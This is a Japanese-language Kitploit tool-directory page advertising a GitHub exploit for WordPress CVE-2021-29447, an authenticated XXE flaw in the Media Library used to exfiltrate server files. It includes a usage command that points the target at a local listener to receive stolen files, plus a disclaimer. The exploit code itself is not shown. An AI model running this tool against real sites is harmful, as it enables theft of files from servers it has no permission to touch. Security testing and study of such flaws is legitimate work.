Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
wordpress-cve-2021-29447 — WordPressメディアライブラリのXML外部エンティティインジェクション(XXE)を悪用して、ファイルを外部に持ち出します。 | Kitploit
ツール/GitHubGitHub/m3l0npan/wordpress-cve-2021-29447
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト学習と教育
GitHubm3l0npan/wordpress-cve-2021-29447

wordpress-cve-2021-29447

WordPressメディアライブラリのXML外部エンティティインジェクション(XXE)を悪用して、ファイルを外部に持ち出します。

リポジトリを見る
423年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

WordPress CVE-2021-29447 エクスプロイト

WordPress Media Library XML の認証済み External Entity Injection (XXE) を悪用して、ファイルを外部に持ち出します。

WordPress 5.7.1 で修正されました。

Media Library を操作するには有効な WordPress 認証情報が必要です。

使用方法

python3 wordpress-cve-2021-29447.py -l http://LOCAL_IP:PORT -r http://WORDPRESS_URL -u USERNAME -p PASSWORD

スクリプトはファイルパスを尋ね、要求されたファイルを返します。

クレジット

David Utón (M3n0sD0n4ld) ExploitDB スクリプトに触発されました。

免責事項

事前に相互の同意なく標的を攻撃するために使用することは違法です。適用されるすべての地域、州、連邦の法律を遵守する責任はエンドユーザーにあります。開発者は一切の責任を負わず、このプログラムによって引き起こされた誤用や損害についても責任を負いません。教育目的でのみ使用してください。

ライセンス

このスクリプトは MIT ライセンス の下で公開されています。

ツールをダウンロード